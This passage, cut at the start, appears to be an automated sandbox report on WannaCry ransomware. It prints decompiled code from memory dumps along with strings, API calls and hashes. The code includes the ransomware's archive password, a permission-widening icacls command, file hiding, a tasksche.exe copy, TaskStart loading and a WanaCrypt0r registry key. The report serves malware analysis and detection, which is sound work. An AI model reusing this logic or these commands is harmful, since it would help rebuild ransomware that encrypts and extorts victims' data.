0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t79[1] & 0x000000ff) * 4);
							_t73 =  &(_t79[2]);
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					if(_a12 != 0) {
						do {
							_t35 = _t35 >> 0x00000008 ^  *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4);
							_t73 =  &(_t73[1]);
							_t32 =  &_a12;
							 *_t32 = _a12 - 1;
						} while ( *_t32 != 0);
					}
					return  !_t35;
				} else {
					return 0;
				}
			}

0x00405422
0x00405427
0x00405436
0x0040543d
0x00405447
0x0040544a
0x0040544f
0x00405465
0x0040547f
0x00405496
0x004054ad
0x004054c4
0x004054db
0x00405503
0x00405505
0x00405506
0x00405506
0x0040550d
0x00405512
0x00405514
0x00405527
0x00405529
0x0040552a
0x0040552a
0x0040552a
0x00405514
0x00405534
0x00405429
0x0040542c
0x0040542c

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
Instruction ID: 3f72058ef88e406f14a8e4c5cd972b2546dbbe82ce95f55f9558457d0f17cbf0
Opcode Fuzzy Hash: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
Instruction Fuzzy Hash: 8E31A133E285B207C3249EBA5C4006AF6D2AB4A125B4A8775DE88F7355E128EC96C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 0040170A Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040170A() {
				void* _t3;
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t13;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;

				if(E00401A45() == 0) {
					L11:
					return 0;
				}
				_t18 =  *0x40f878; // 0x0
				if(_t18 != 0) {
					L10:
					_t3 = 1;
					return _t3;
				}
				_t13 = LoadLibraryA("kernel32.dll");
				if(_t13 == 0) {
					goto L11;
				}
				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
				_t11 = GetProcAddress(_t13, "CloseHandle");
				_t20 =  *0x40f878; // 0x0
				 *0x40f890 = _t11;
				if(_t20 == 0) {
					goto L11;
				}
				_t21 =  *0x40f87c; // 0x0
				if(_t21 == 0) {
					goto L11;
				}
				_t22 =  *0x40f880; // 0x0
				if(_t22 == 0) {
					goto L11;
				}
				_t23 =  *0x40f884; // 0x0
				if(_t23 == 0) {
					goto L11;
				}
				_t24 =  *0x40f888; // 0x0
				if(_t24 == 0) {
					goto L11;
				}
				_t25 =  *0x40f88c; // 0x0
				if(_t25 == 0 || _t11 == 0) {
					goto L11;
				} else {
					goto L10;
				}
			}

0x00401713
0x004017d8
0x00000000
0x004017d8
0x0040171b
0x00401721
0x004017d3
0x004017d5
0x00000000
0x004017d5
0x00401732
0x00401736
0x00000000
0x00000000
0x00401751
0x0040175e
0x0040176b
0x00401778
0x00401785
0x00401792
0x00401797
0x00401799
0x0040179f
0x004017a5
0x00000000
0x00000000
0x004017a7
0x004017ad
0x00000000
0x00000000
0x004017af
0x004017b5
0x00000000
0x00000000
0x004017b7
0x004017bd
0x00000000
0x00000000
0x004017bf
0x004017c5
0x00000000
0x00000000
0x004017c7
0x004017cd
0x00000000
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8

LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797

Strings

WriteFile, xrefs: 0040174B
kernel32.dll, xrefs: 00401727
CloseHandle, xrefs: 0040178C
DeleteFileW, xrefs: 0040177F
MoveFileW, xrefs: 00401765
CreateFileW, xrefs: 00401743
MoveFileExW, xrefs: 00401772
ReadFile, xrefs: 00401758

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
API String ID: 2238633743-1294736154
Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E

Uniqueness

Uniqueness Score: -1.00%

Function 00407136 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
				long _v8;
				char _v267;
				char _v268;
				struct _FILETIME _v284;
				struct _FILETIME _v292;
				struct _FILETIME _v300;
				long _v304;
				char _v568;
				char _v828;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t96;
				intOrPtr _t97;
				char _t100;
				void* _t112;
				void* _t113;
				int _t124;
				long _t131;
				intOrPtr _t136;
				char* _t137;
				char* _t144;
				void* _t148;
				char* _t150;
				void* _t154;
				signed int _t155;
				long _t156;
				void* _t157;
				char* _t158;
				long _t159;
				intOrPtr* _t161;
				long _t162;
				void* _t163;
				void* _t164;

				_t154 = __edx;
				_t139 = __ecx;
				_t136 = _a16;
				_t161 = __ecx;
				if(_t136 == 3) {
					_t78 =  *((intOrPtr*)(__ecx + 4));
					_t155 = _a4;
					__eflags = _t155 - _t78;
					if(_t155 == _t78) {
						L14:
						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
						__eflags = _t156;
						if(_t156 <= 0) {
							E00406A97( *_t161);
							_t14 = _t161 + 4;
							 *_t14 =  *(_t161 + 4) | 0xffffffff;
							__eflags =  *_t14;
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = _t156;
							if(_t156 <= 0) {
								__eflags = _t156 - 0xffffff96;
								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
							}
							return 0x600;
						} else {
							L17:
							return 0;
						}
					}
					__eflags = _t78 - 0xffffffff;
					if(_t78 != 0xffffffff) {
						E00406A97( *__ecx);
						_pop(_t139);
					}
					_t89 =  *_t161;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
						L3:
						return 0x10000;
					} else {
						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
							L11:
							_t91 =  *_t161;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
								 *(_t161 + 4) = _t155;
								_pop(_t139);
								goto L14;
							}
							E00406520(_t91);
							L10:
							goto L11;
						}
						E004064E2(_t139, _t89);
						goto L10;
					}
				}
				if(_t136 == 2 || _t136 == 1) {
					__eflags =  *(_t161 + 4) - 0xffffffff;
					if( *(_t161 + 4) != 0xffffffff) {
						E00406A97( *_t161);
						_pop(_t139);
					}
					_t96 =  *_t161;
					_t157 = _a4;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
						goto L3;
					} else {
						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
							L27:
							_t97 =  *_t161;
							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
								E00406C40(_t161, _t154, _t157,  &_v568);
								__eflags = _v304 & 0x00000010;
								if((_v304 & 0x00000010) == 0) {
									__eflags = _t136 - 1;
									if(_t136 != 1) {
										_t158 = _a8;
										_t137 = _t158;
										_t144 = _t158;
										_t100 =  *_t158;
										while(1) {
											__eflags = _t100;
											if(_t100 == 0) {
												break;
											}
											__eflags = _t100 - 0x2f;
											if(_t100 == 0x2f) {
												L44:
												_t137 =  &(_t144[1]);
												L45:
												_t100 = _t144[1];
												_t144 =  &(_t144[1]);
												continue;
											}
											__eflags = _t100 - 0x5c;
											if(_t100 != 0x5c) {
												goto L45;
											}
											goto L44;
										}
										strcpy( &_v268, _t158);
										__eflags = _t137 - _t158;
										if(_t137 != _t158) {
											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
											__eflags = _v268 - 0x2f;
											if(_v268 == 0x2f) {
												L56:
												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
												E00407070(0,  &_v268);
												_t164 = _t164 + 0x18;
												L49:
												__eflags = 0;
												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
												L50:
												__eflags = _t112 - 0xffffffff;
												_a4 = _t112;
												if(_t112 != 0xffffffff) {
													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
													__eflags =  *(_t161 + 0x13c);
													_pop(_t148);
													if( *(_t161 + 0x13c) == 0) {
														L00407700();
														_t148 = 0x4000;
														 *(_t161 + 0x13c) = _t113;
													}
													_t60 =  &_a12;
													 *_t60 = _a12 & 0x00000000;
													__eflags =  *_t60;
													while(1) {
														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
														_t164 = _t164 + 0x10;
														__eflags = _t159 - 0xffffff96;
														if(_t159 == 0xffffff96) {
															break;
														}
														__eflags = _t159;
														if(__eflags < 0) {
															L68:
															_a12 = 0x5000000;
															L71:
															__eflags = _a16 - 1;
															if(_a16 != 1) {
																CloseHandle(_a4);
															}
															E00406A97( *_t161);
															return _a12;
														}
														if(__eflags <= 0) {
															L64:
															__eflags = _a11;
															if(_a11 != 0) {
																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
																goto L71;
															}
															__eflags = _t159;
															if(_t159 == 0) {
																goto L68;
															}
															continue;
														}
														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
														__eflags = _t124;
														if(_t124 == 0) {
															_a12 = 0x400;
															goto L71;
														}
														goto L64;
													}
													_a12 = 0x1000;
													goto L71;
												}
												return 0x200;
											}
											__eflags = _v268 - 0x5c;
											if(_v268 == 0x5c) {
												goto L56;
											}
											__eflags = _v268;
											if(_v268 == 0) {
												L48:
												_t160 = _t161 + 0x140;
												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
												E00407070(_t160,  &_v268);
												_t164 = _t164 + 0x1c;
												goto L49;
											}
											__eflags = _v267 - 0x3a;
											if(_v267 != 0x3a) {
												goto L48;
											}
											goto L56;
										}
										_t37 =  &_v268;
										 *_t37 = _v268 & 0x00000000;
										__eflags =  *_t37;
										goto L48;
									}
									_t112 = _a8;
									goto L50;
								}
								__eflags = _t136 - 1;
								if(_t136 == 1) {
									goto L17;
								}
								_t150 = _a8;
								_t131 =  *_t150;
								__eflags = _t131 - 0x2f;
								if(_t131 == 0x2f) {
									L35:
									_push(_t150);
									_push(0);
									L37:
									E00407070();
									goto L17;
								}
								__eflags = _t131 - 0x5c;
								if(_t131 == 0x5c) {
									goto L35;
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L36:
									_t162 = _t161 + 0x140;
									__eflags = _t162;
									_push(_t150);
									_push(_t162);
									goto L37;
								}
								__eflags = _t150[1] - 0x3a;
								if(_t150[1] != 0x3a) {
									goto L36;
								}
								goto L35;
							}
							E00406520(_t97);
							L26:
							goto L27;
						}
						E004064E2(_t139, _t96);
						goto L26;
					}
				} else {
					goto L3;
				}
			}

0x00407136
0x00407136
0x00407140
0x00407148
0x0040714a
0x00407168
0x0040716b
0x0040716e
0x00407170
0x004071b7
0x004071c8
0x004071cd
0x004071cf
0x004071d3
0x004071d8
0x004071d8
0x004071d8
0x004071dc
0x004071dd
0x004071e1
0x004071ea
0x004071ec
0x004071fa
0x00000000
0x00407206
0x00000000
0x004071e3
0x004071e3
0x00000000
0x004071e3
0x004071e1
0x00407172
0x00407175
0x00407179
0x0040717e
0x0040717e
0x0040717f
0x00407181
0x00407185
0x00407188
0x0040715e
0x00000000
0x0040718a
0x0040718a
0x0040718d
0x00407196
0x00407196
0x00407198
0x0040719b
0x004071ad
0x004071b3
0x004071b6
0x00000000
0x004071b6
0x0040719e
0x00407195
0x00000000
0x00407195
0x00407190
0x00000000
0x00407190
0x00407188
0x0040714f
0x00407210
0x00407214
0x00407218
0x0040721d
0x0040721d
0x0040721e
0x00407220
0x00407223
0x00407227
0x0040722a
0x00000000
0x00407230
0x00407230
0x00407233
0x0040723c
0x0040723c
0x0040723e
0x00407241
0x00407255
0x0040725a
0x00407261
0x0040729c
0x0040729f
0x004072a9
0x004072ac
0x004072ae
0x004072b0
0x004072b2
0x004072b2
0x004072b4
0x00000000
0x00000000
0x004072b6
0x004072b8
0x004072be
0x004072be
0x004072c1
0x004072c1
0x004072c4
0x00000000
0x004072c4
0x004072ba
0x004072bc
0x00000000
0x00000000
0x00000000
0x004072bc
0x004072cf
0x004072d5
0x004072d8
0x00407347
0x0040734f
0x00407356
0x0040737b
0x0040738f
0x0040739e
0x004073a3
0x00407312
0x00407312
0x0040732b
0x00407331
0x00407331
0x00407334
0x00407337
0x004073b3
0x004073b8
0x004073c0
0x004073c6
0x004073c9
0x004073ce
0x004073cf
0x004073cf
0x004073d5
0x004073d5
0x004073d5
0x004073d9
0x004073eb
0x004073ed
0x004073f0
0x004073f3
0x00000000
0x00000000
0x004073f5
0x004073f7
0x0040742a
0x0040742a
0x0040745a
0x0040745a
0x0040745e
0x00407463
0x00407463
0x0040746b
0x00000000
0x00407473
0x004073f9
0x00407415
0x00407415
0x00407419
0x00407454
0x00000000
0x00407454
0x0040741b
0x0040741d
0x00000000
0x00000000
0x00000000
0x0040741f
0x0040740b
0x00407411
0x00407413
0x00407433
0x00000000
0x00407433
0x00000000
0x00407413
0x00407421
0x00000000
0x00407421
0x00000000
0x00407339
0x00407358
0x0040735f
0x00000000
0x00000000
0x00407361
0x00407368
0x004072e1
0x004072e7
0x004072fc
0x0040730a
0x0040730f
0x00000000
0x0040730f
0x0040736e
0x00407375
0x00000000
0x00000000
0x00000000
0x00407375
0x004072da
0x004072da
0x004072da
0x00000000
0x004072da
0x004072a1
0x00000000
0x004072a1
0x00407263
0x00407266
0x00000000
0x00000000
0x0040726c
0x0040726f
0x00407271
0x00407273
0x00407283
0x00407283
0x00407284
0x00407290
0x00407290
0x00000000
0x00407296
0x00407275
0x00407277
0x00000000
0x00000000
0x00407279
0x0040727b
0x00407288
0x00407288
0x00407288
0x0040728e
0x0040728f
0x00000000
0x0040728f
0x0040727d
0x00407281
0x00000000
0x00000000
0x00000000
0x00407281
0x00407244
0x0040723b
0x00000000
0x0040723b
0x00407236
0x00000000
0x00407236
0x00000000
0x00000000
0x00000000

Strings

:, xrefs: 0040736E
%s%s, xrefs: 00407389
%s%s%s, xrefs: 004072F6
\, xrefs: 00407358

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID:
String ID: %s%s$%s%s%s$:$\
API String ID: 0-1100577047
Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040203B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040203B(intOrPtr* __eax, void* __edi) {
				void* _t25;
				intOrPtr* _t33;
				int _t42;
				CHAR* _t63;
				void* _t64;
				char** _t66;

				__imp____p___argv();
				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
					L4:
					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
					}
					SetCurrentDirectoryA(_t64 - 0x20c);
					E004010FD(1);
					 *_t66 = "WNcry@2ol7";
					_push(_t42);
					L00401DAB();
					E00401E9E();
					E00401064("attrib +h .", _t42, _t42);
					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
					_t25 = E0040170A();
					_t74 = _t25;
					if(_t25 != 0) {
						E004012FD(_t64 - 0x6e4, _t74);
						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
							 *(_t64 - 4) = _t42;
							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
								_t33 = E00402924(_t32, "TaskStart");
								_t78 = _t33 - _t42;
								if(_t33 != _t42) {
									 *_t33(_t42, _t42);
								}
							}
						}
						E0040137A(_t64 - 0x6e4, _t78);
					}
					goto L13;
				} else {
					_t63 = "tasksche.exe";
					CopyFileA(_t64 - 0x20c, _t63, _t42);
					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
						goto L4;
					} else {
						L13:
						return 0;
					}
				}
			}

0x00402040
0x00402054
0x0040208e
0x004020a3
0x004020b1
0x004020b3
0x004020bb
0x004020c3
0x004020c8
0x004020cf
0x004020d0
0x004020d5
0x004020e1
0x004020ed
0x004020f5
0x004020fa
0x004020fc
0x00402104
0x00402119
0x0040212a
0x00402134
0x0040214b
0x00402151
0x00402154
0x00402158
0x00402158
0x00402154
0x00402134
0x00402160
0x00402160
0x00000000
0x00402061
0x00402061
0x0040206f
0x0040207f
0x00000000
0x00402165
0x00402165
0x0040216b
0x0040216b
0x0040207f

APIs

__p___argv.MSVCRT(0040F538), ref: 00402040
strcmp.MSVCRT(?), ref: 0040204B
CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076

Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97

strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
strrchr.MSVCRT(?,0000005C), ref: 004020AE
SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB

Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10

Strings

icacls . /grant Everyone:F /T /C /Q, xrefs: 004020E8
TaskStart, xrefs: 00402145
t.wnry, xrefs: 00402125
tasksche.exe, xrefs: 00402061, 0040206D, 00402075
attrib +h ., xrefs: 004020DC

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
API String ID: 1074704982-2844324180
Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28

Uniqueness

Uniqueness Score: -1.00%

Function 004010FD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 100
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004010FD(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				void _v196;
				long _v216;
				void _v735;
				char _v736;
				signed int _t44;
				void* _t46;
				signed int _t55;
				signed int _t56;
				char* _t72;
				void* _t77;

				_t56 = 5;
				memcpy( &_v216, L"Software\\", _t56 << 2);
				_push(0x2d);
				_v736 = _v736 & 0;
				_v8 = _v8 & 0x00000000;
				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
				asm("stosw");
				asm("stosb");
				wcscat( &_v216, L"WanaCrypt0r");
				_v12 = _v12 & 0x00000000;
				_t72 = "wd";
				do {
					_push( &_v8);
					_push( &_v216);
					if(_v12 != 0) {
						_push(0x80000001);
					} else {
						_push(0x80000002);
					}
					RegCreateKeyW();
					if(_v8 != 0) {
						if(_a4 == 0) {
							_v16 = 0x207;
							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
							asm("sbb esi, esi");
							_t77 =  ~_t44 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v736);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v736);
							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
							asm("sbb esi, esi");
							_t77 =  ~_t55 + 1;
						}
						RegCloseKey(_v8);
						if(_t77 != 0) {
							_t46 = 1;
							return _t46;
						} else {
							goto L10;
						}
					}
					L10:
					_v12 = _v12 + 1;
				} while (_v12 < 2);
				return 0;
			}

0x0040110f
0x00401116
0x00401118
0x0040111c
0x00401129
0x0040113a
0x0040113c
0x0040113e
0x0040114b
0x00401151
0x00401157
0x0040115c
0x00401164
0x0040116b
0x0040116c
0x00401175
0x0040116e
0x0040116e
0x0040116e
0x0040117a
0x00401183
0x0040118c
0x004011cf
0x004011e4
0x004011ee
0x004011f0
0x004011f1
0x004011fa
0x004011fa
0x0040118e
0x0040119a
0x004011bd
0x004011c7
0x004011c9
0x004011c9
0x00401203
0x0040120b
0x00401222
0x00000000
0x00000000
0x00000000
0x00000000
0x0040120b
0x0040120d
0x0040120d
0x00401210
0x00000000

APIs

